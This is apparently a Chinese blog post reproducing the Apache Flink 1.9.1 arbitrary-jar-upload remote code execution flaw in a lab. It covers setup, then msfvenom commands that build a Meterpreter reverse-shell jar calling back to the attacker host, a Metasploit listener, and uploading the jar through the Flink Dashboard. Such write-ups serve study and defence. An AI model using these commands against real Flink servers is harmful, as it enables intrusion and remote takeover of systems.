Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

0x00简介

Apache Flink是近几年大火的数据处理引擎。受到各大厂商的推崇并且已经应用与实际的业务场景中。很多公司在进行选型的时候都会选择Apache Flink作为选型的对象。

Apache Flink能用来做什么?

l 实时推荐系统

l 实时报表

l 实时数仓与ETL

l 复杂事件处理

l 实时欺诈与实时信用评估

l 大数据安全监测
Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。

0x01漏洞介绍

***者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的

0x02影响范围

至目前Apache Flink 1.9.1版本

0x03环境搭建

***机kali:192.168.10.147

受害机Ubuntu:192.168.10.176

测试环境:Flink 1.9.1 java8+

Apache Flink 1.9.1安装包下载:

<a href="https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz">https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz</a>;

下载完成后使用解压

tar zxvf flink-1.9.1-bin-scala_2.11.tgz

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

进入bin目录运行./start-cluster.sh启动环境
Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

环境搭建成功 目标站点

http://192.168.10.176:8081
Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

0x04漏洞复现

1、使用kali生成jar后门包

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.10.147 LPORT=2020 -f jar > shell.jar

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

2、***机访问目标站点 并上传shell.jar

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

3、使用kali配置监听

use exploit/multi/handler

set payload java/shell/reverse_tcp

set RHOST 192.168.10.147

set LPORT 2020

run

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

4、点开刚刚上传的shell.jar,触发漏洞

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

0x05修复方式

更新官方补丁或更新最新版本

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值